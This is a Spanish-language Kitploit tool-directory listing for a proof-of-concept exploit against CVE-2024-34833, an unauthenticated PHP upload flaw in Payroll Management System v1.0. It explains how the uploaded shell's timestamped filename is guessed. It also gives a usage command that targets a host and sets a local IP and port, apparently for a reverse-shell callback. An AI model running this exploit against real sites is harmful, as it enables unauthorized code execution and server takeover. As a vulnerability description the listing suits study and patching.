Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2024-34833-payroll-management-system-rce | Kitploit
Herramientas/GitHubGitHub/shellunease/cve-2024-34833-payroll-management-system-rce
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed Teaming
GitHubshellunease/cve-2024-34833-payroll-management-system-rce

CVE-2024-34833-payroll-management-system-rce

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Ver Repositorio
hace 2 añosAún no revisado

CVE-2024-34833 Payroll Management System RCE (Sin autenticación) PoC

RCE mediante carga de archivos para https://www.sourcecodester.com/php/14475/payroll-management-system-using-phpmysql-source-code.html. Los nombres de archivo tienen una marca de tiempo antepuesta con precisión de minuto. El script intenta adivinar el nombre del archivo usando la marca de tiempo del minuto actual, el anterior y el siguiente.

Descripción de la vulnerabilidad

Payroll Management System v1.0 permite a los usuarios subir imágenes a través de la página "save_settings". Un atacante no autenticado puede aprovechar esta funcionalidad para subir en su lugar un archivo PHP malicioso. Los archivos subidos se almacenan en una carpeta de acceso público y tienen una marca de tiempo con precisión de minuto añadida a sus nombres de archivo, que se puede calcular fácilmente. La explotación exitosa de esta vulnerabilidad resulta en la capacidad de ejecutar código arbitrario como el usuario que ejecuta el servidor web.

Ejemplo de uso

root@kitploit:~
python3 exploit.py -rhost somewebsite.com -rport 443 -lhost 192.168.22.23 -lport 443 -https

Ejemplo de vídeo

Descargar herramienta